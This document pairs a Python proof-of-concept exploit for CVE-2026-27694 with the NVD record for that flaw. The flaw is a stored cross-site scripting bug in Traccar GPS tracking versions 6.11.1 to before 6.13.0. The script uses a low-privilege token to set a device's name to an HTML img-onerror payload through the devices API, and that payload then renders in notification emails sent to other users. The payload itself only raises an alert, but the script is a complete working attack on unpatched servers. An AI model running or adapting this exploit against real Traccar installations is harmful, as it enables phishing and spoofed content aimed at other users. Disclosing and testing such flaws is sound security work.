CVE-2026-27694

import requests # Configuration TARGET_URL = "http://localhost:8082/api/devices" USER_TOKEN = "<LOW_PRIVILEGE_USER_TOKEN>" DEVICE_ID = 1 # Malicious Payload: Stored XSS via device name # This payload attempts to execute JavaScript when the email is rendered xss_payload = '<img src=x onerror=alert(\'XSS-CVE-2026-27694\')>' headers = { "Authorization": f"Bearer {USER_TOKEN}", "Content-Type": "application/json" } # Data to update device name with malicious payload payload_data = { "id": DEVICE_ID, "name": xss_payload, "groupId": 0, "category": "default" } try: # Send request to update device name response = requests.put(f"{TARGET_URL}/{DEVICE_ID}", json=payload_data, headers=headers) if response.status_code == 200: print("[+] Payload injected successfully.") print("[+] Trigger an event (e.g., geofence entry) to send the notification email.") print("[+] Check the email client for the alert popup.") else: print(f"[-] Failed to inject payload. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-27694", "sourceIdentifier": "[email protected]", "published": "2026-05-05T13:16:28.513", "lastModified": "2026-05-08T20:03:41.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.11.1", "versionEndExcluding": "6.13.0", "matchCriteriaId": "A453268E-69E6-4CE2-A341-8890520DF28E"}]}]}], "references": [{"url": "https://github.com/traccar/traccar/security/advisories/GHSA-6hfr-mj4m-hrvv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}, {"url": "https://github.com/traccar/traccar/security/advisories/GHSA-6hfr-mj4m-hrvv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}